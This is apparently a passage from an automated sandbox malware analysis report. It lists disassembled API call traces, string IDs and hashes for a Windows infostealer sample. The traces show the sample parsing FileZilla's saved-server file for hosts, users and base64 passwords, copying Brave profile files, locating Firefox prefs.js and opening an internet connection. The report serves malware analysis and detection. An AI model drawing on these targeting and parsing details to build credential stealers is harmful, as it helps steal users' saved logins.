                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                                    • String ID: \*.*
                                    • API String ID: 712834838-1173974218
                                    • Opcode ID: 071883dacfbd7266514c5b248a8125e2edb089970d6eb957d0983d17b241912c
                                    • Instruction ID: 4a198bf7ea5d4dac4f2e6fd42b53b1d347439d2078286f7252137290ead8deae
                                    • Opcode Fuzzy Hash: 071883dacfbd7266514c5b248a8125e2edb089970d6eb957d0983d17b241912c
                                    • Instruction Fuzzy Hash: 81627F31A12616ABCB21EFA8DC58AEF77F9AF51700F440139F805A7662DB34DD41CBA1
                                    APIs
                                    • wsprintfA.USER32 ref: 000B392C
                                    • FindFirstFileA.KERNEL32(?,?), ref: 000B3943
                                    • StrCmpCA.SHLWAPI(?,000D17A0), ref: 000B396C
                                    • StrCmpCA.SHLWAPI(?,000D17A4), ref: 000B3986
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B39BF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B39E7
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B39F2
                                    • lstrlen.KERNEL32(000D1794), ref: 000B39FD
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3A1A
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000B3A26
                                    • lstrlen.KERNEL32(?), ref: 000B3A33
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3A53
                                    • lstrcat.KERNEL32(00000000,?), ref: 000B3A61
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3A8A
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B3ACE
                                    • lstrlen.KERNEL32(?), ref: 000B3AD8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3B05
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B3B10
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3B36
                                    • lstrlen.KERNEL32(000D1794), ref: 000B3B48
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3B6A
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000B3B76
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3B9E
                                    • lstrlen.KERNEL32(?), ref: 000B3BB2
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3BD2
                                    • lstrcat.KERNEL32(00000000,?), ref: 000B3BE0
                                    • lstrlen.KERNEL32(00E68980), ref: 000B3C0B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3C31
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B3C3C
                                    • lstrlen.KERNEL32(00E687F0), ref: 000B3C5E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3C84
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B3C8F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3CB7
                                    • lstrlen.KERNEL32(000D1794), ref: 000B3CC9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3CE8
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000B3CF4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3D1A
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B3D47
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B3D52
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3D79
                                    • lstrlen.KERNEL32(000D1794), ref: 000B3D8B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3DAD
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000B3DB9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3DE2
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3E11
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B3E1C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3E43
                                    • lstrlen.KERNEL32(000D1794), ref: 000B3E55
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3E77
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000B3E83
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3EAC
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3EDB
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B3EE6
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3F0D
                                    • lstrlen.KERNEL32(000D1794), ref: 000B3F1F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3F41
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000B3F4D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3F75
                                    • lstrlen.KERNEL32(?), ref: 000B3F89
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3FA9
                                    • lstrcat.KERNEL32(00000000,?), ref: 000B3FB7
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B3FE0
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B401F
                                    • lstrlen.KERNEL32(00E6CDB8), ref: 000B402E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B4056
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B4061
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B408A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B40CE
                                    • lstrcat.KERNEL32(00000000), ref: 000B40DB
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 000B42D9
                                    • FindClose.KERNEL32(00000000), ref: 000B42E8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\*.*
                                    • API String ID: 1006159827-1013718255
                                    • Opcode ID: f7329e20c540061de5b69c59cbc7895b962589cb33649399dc12905472ffd4a5
                                    • Instruction ID: 63de3766b0eaf00e5346476a01141e65e8ff855589b2c589dd17c39cc0600890
                                    • Opcode Fuzzy Hash: f7329e20c540061de5b69c59cbc7895b962589cb33649399dc12905472ffd4a5
                                    • Instruction Fuzzy Hash: 7262A031E11616ABCB21EFA8EC4DAEE77F9AF51700F144129F805A7662DB34DE41CB90
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B6995
                                    • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 000B69C8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B6A02
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B6A29
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B6A34
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B6A5D
                                    • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 000B6A77
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B6A99
                                    • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 000B6AA5
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B6AD0
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B6B00
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 000B6B35
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B6B9D
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B6BCD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                    • API String ID: 313953988-555421843
                                    • Opcode ID: a676be337cc8d0f7ce4b6383f42b7a9e3e78e8cd6b4e7d0be6ce0e5d1ecf404d
                                    • Instruction ID: f2d0c2e902661a0a91fdc6ccd53788695d7242ce1777a21bf58189d039b4308a
                                    • Opcode Fuzzy Hash: a676be337cc8d0f7ce4b6383f42b7a9e3e78e8cd6b4e7d0be6ce0e5d1ecf404d
                                    • Instruction Fuzzy Hash: 23427E30E01216ABDB11EBB8EC49EEE7BB9AF55700F044429F905EB252DB39DD41CB60
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000ADBC1
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADBE4
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000ADBEF
                                    • lstrlen.KERNEL32(000D4CA8), ref: 000ADBFA
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADC17
                                    • lstrcat.KERNEL32(00000000,000D4CA8), ref: 000ADC23
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADC4C
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000ADC8F
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000ADCBF
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 000ADCD0
                                    • StrCmpCA.SHLWAPI(?,000D17A0), ref: 000ADCF0
                                    • StrCmpCA.SHLWAPI(?,000D17A4), ref: 000ADD0A
                                    • lstrlen.KERNEL32(000CCFEC), ref: 000ADD1D
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000ADD47
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADD70
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000ADD7B
                                    • lstrlen.KERNEL32(000D1794), ref: 000ADD86
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADDA3
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000ADDAF
                                    • lstrlen.KERNEL32(?), ref: 000ADDBC
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADDDF
                                    • lstrcat.KERNEL32(00000000,?), ref: 000ADDED
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADE19
                                    • lstrlen.KERNEL32(000D1794), ref: 000ADE3D
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000ADE6F
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000ADE7B
                                    • lstrlen.KERNEL32(00E68A60), ref: 000ADE8A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADEB0
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000ADEBB
                                    • lstrlen.KERNEL32(000D1794), ref: 000ADEC6
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000ADEE6
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000ADEF2
                                    • lstrlen.KERNEL32(00E689D0), ref: 000ADF01
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADF27
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000ADF32
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADF5E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADFA5
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000ADFB1
                                    • lstrlen.KERNEL32(00E68A60), ref: 000ADFC0
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADFE9
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000ADFF4
                                    • lstrlen.KERNEL32(000D1794), ref: 000ADFFF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000AE022
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000AE02E
                                    • lstrlen.KERNEL32(00E689D0), ref: 000AE03D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AE063
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000AE06E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AE09A
                                    • StrCmpCA.SHLWAPI(?,Brave), ref: 000AE0CD
                                    • StrCmpCA.SHLWAPI(?,Preferences), ref: 000AE0E7
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000AE11F
                                    • lstrlen.KERNEL32(00E6CDB8), ref: 000AE12E
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000AE155
                                    • lstrcat.KERNEL32(00000000,?), ref: 000AE15D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AE19F
                                    • lstrcat.KERNEL32(00000000), ref: 000AE1A9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AE1D0
                                    • CopyFileA.KERNEL32(00000000,?,00000001), ref: 000AE1F9
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000AE22F
                                    • lstrlen.KERNEL32(00E68980), ref: 000AE23D
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000AE261
                                    • lstrcat.KERNEL32(00000000,00E68980), ref: 000AE269
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 000AE988
                                    • FindClose.KERNEL32(00000000), ref: 000AE997
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                                    • String ID: Brave$Preferences$\Brave\Preferences
                                    • API String ID: 1346089424-1230934161
                                    • Opcode ID: 97bd2f494c50cd283b908c32e81539b3fa66e9994580d3e547a715c4beb532e0
                                    • Instruction ID: 7e7fd60988e9bdad6cd9003b15f68426037b4c9f1514e9fbadf7fd96c5fee547
                                    • Opcode Fuzzy Hash: 97bd2f494c50cd283b908c32e81539b3fa66e9994580d3e547a715c4beb532e0
                                    • Instruction Fuzzy Hash: 8B528071E112169FCB61EFE8EC89AEE77F9AF55700F044029F84A97662DB34DC418B90
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A60FF
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000A6152
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000A6185
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000A61B5
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000A61F0
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000A6223
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 000A6233
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$InternetOpen
                                    • String ID: "$------$x
                                    • API String ID: 2041821634-3736061133
                                    • Opcode ID: 320353e9890208cc076e81da20d26d0a7acbfa8e6c66e44cf11a0e779128bf6f
                                    • Instruction ID: d9577308f9886b1a5b96c3d7a0d35eb2d3d59109f7cb1bc7f4285a8bee363787
                                    • Opcode Fuzzy Hash: 320353e9890208cc076e81da20d26d0a7acbfa8e6c66e44cf11a0e779128bf6f
                                    • Instruction Fuzzy Hash: 5C524C31E112169BDB21EBF8EC49BEE77B9AF15700F184029F805AB252DB35DD428B91
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B6B9D
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B6BCD
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B6BFD
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B6C2F
                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 000B6C3C
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000B6C43
                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 000B6C5A
                                    • lstrlen.KERNEL32(00000000), ref: 000B6C65
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B6CA8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B6CCF
                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 000B6CE2
                                    • lstrlen.KERNEL32(00000000), ref: 000B6CED
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B6D30
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B6D57
                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 000B6D6A
                                    • lstrlen.KERNEL32(00000000), ref: 000B6D75
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B6DB8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B6DDF
                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 000B6DF2
                                    • lstrlen.KERNEL32(00000000), ref: 000B6E01
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B6E49
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B6E71
                                    • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 000B6E94
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 000B6EA8
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 000B6EC9
                                    • LocalFree.KERNEL32(00000000), ref: 000B6ED4
                                    • lstrlen.KERNEL32(?), ref: 000B6F6E
                                    • lstrlen.KERNEL32(?), ref: 000B6F81
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                                    • API String ID: 2641759534-2314656281
                                    • Opcode ID: b6f62b96335b1025b0873a4a7cef91a8f7d959152f711206d6ccb23a2982f142
                                    • Instruction ID: fbd56bfafb1609e2ee53795d5c8ba9d8b7e4c8788b27793b13c3ae417bae2a5f
                                    • Opcode Fuzzy Hash: b6f62b96335b1025b0873a4a7cef91a8f7d959152f711206d6ccb23a2982f142
                                    • Instruction Fuzzy Hash: 98026C30E11215AFDB11EBB8EC49EEE7BB9AF55700F144429F906EB252DB34DD418B60
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B4B51
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B4B74
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B4B7F
                                    • lstrlen.KERNEL32(000D4CA8), ref: 000B4B8A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B4BA7
                                    • lstrcat.KERNEL32(00000000,000D4CA8), ref: 000B4BB3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B4BDE
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 000B4BFA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                    • String ID: prefs.js
                                    • API String ID: 2567437900-3783873740
